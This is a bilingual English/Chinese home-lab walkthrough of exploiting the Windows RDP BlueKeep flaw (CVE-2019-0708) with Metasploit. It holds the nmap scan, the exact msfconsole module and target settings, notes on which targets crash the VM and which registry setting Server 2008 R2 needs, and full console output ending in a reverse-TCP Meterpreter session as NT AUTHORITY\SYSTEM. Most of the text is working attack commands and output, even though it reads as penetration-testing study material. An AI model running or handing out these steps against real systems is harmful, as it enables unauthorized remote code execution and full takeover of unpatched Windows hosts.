Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)
1
2
3
4
sudo nmap -p 3389 10.10.10.7
PORT STATE SERVICE
3389/tcp open ms-wbt-server
CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
CVE-2019-0708 BlueKeep Microsoft 远程桌面 RCE 检查
此模块通过将 MS_T120 通道绑定到其正常插槽之外并发送非 DoS 数据包来检查一系列主机是否存在 CVE-2019-0708 漏洞,这些数据包在修补和易受攻击的主机上响应不同。它可以选择性地触发 DoS 漏洞。
CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
CVE-2019-0708 BlueKeep RDP 远程 Windows 内核在释放后使用
RDP termdd.sys 驱动程序不正确地处理绑定到仅限内部通道 MS_T120,从而允许格式错误的断开提供程序指示消息导致释放后使用。通过可控的数据/大小远程非分页池喷射,释放通道的间接调用小工具用于实现任意代码执行。Windows 7 SP1 和 Windows Server 2008 R2 是目前唯一支持的目标。假设您的目标选择与系统的内存布局正确匹配,Windows 7 SP1 在其默认配置中应该是可利用的。HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam 需要设置为 0 才能成功利用 Windows Server 2008 R2。这是普通服务器的非标准配置,如果没有设置上述注册表项,目标将崩溃!如果无论如何目标都崩溃了,您可能需要确定内核内存中的非分页池基础并将其设置为 GROOMBASE 选项。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msfconsole
search BlueKeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS 10.10.10.7
run
search BlueKeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS 10.10.10.7
exploit
show targets
set target 2
exploit
meterpreter> sysinfo
meterpreter> getuid
Home Lab
环境:Windows 7 SP1
Enable Windows Server 2008 R2 Remote Desktop Services
How-To Enable Remote Desktop RDP on Windows 7
在Windows Server 2008 R2环境中,需要将HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam设置0,才能成功利用BlueKeep。而Windows 7 SP1 在其默认配置中是可利用的。
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~]
└─# nmap -p 3389 192.168.248.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-06 08:52 EDT
Nmap scan report for 192.168.248.150
Host is up (0.00033s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:9A:7D:04 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
如果不设置target,则无法利用。将target设置为2-5(虚拟机),都会导致目标Windows 7 SP1崩溃。而将target设置为1(实体机),可以成功利用BlueKeep获得meterpreter会话,尽管目标是运行在Vmware 16中的虚拟机。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > search BlueKeep
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf6 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 192.168.248.150
RHOSTS => 192.168.248.150
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
[+] 192.168.248.150:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.248.150:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 192.168.248.150
RHOSTS => 192.168.248.150
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.150:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.248.150:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.248.150:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.248.150:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.150:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[-] 192.168.248.150:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !
[*] Exploit completed, but no session was created.
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 5
target => 5
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.150:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.248.150:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.248.150:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.248.150:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.150:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.248.150:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028608000, Channel count 1.
[!] 192.168.248.150:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.248.150:3389 - Surfing channels ...
[*] 192.168.248.150:3389 - Lobbing eggs ...
[*] 192.168.248.150:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.248.150:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Exploit completed, but no session was created.
Windows 7 SP1崩溃了。
当我们设置target为Windows 7 SP1 / 2008 R2 (6.1.7601 x64)时,成功获得meterpreter。
1
2
3
4
5
Exploit targets:
Id Name
-- ----
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
target => 1
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.150:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.248.150:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.248.150:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.248.150:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.150:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.248.150:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[!] 192.168.248.150:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.248.150:3389 - Surfing channels ...
[*] 192.168.248.150:3389 - Lobbing eggs ...
[*] 192.168.248.150:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.248.150:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200774 bytes) to 192.168.248.150
[*] Meterpreter session 1 opened (192.168.248.148:4444 -> 192.168.248.150:49159) at 2022-10-06 09:18:30 -0400
meterpreter > sysinfo
Computer : IEWIN7
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
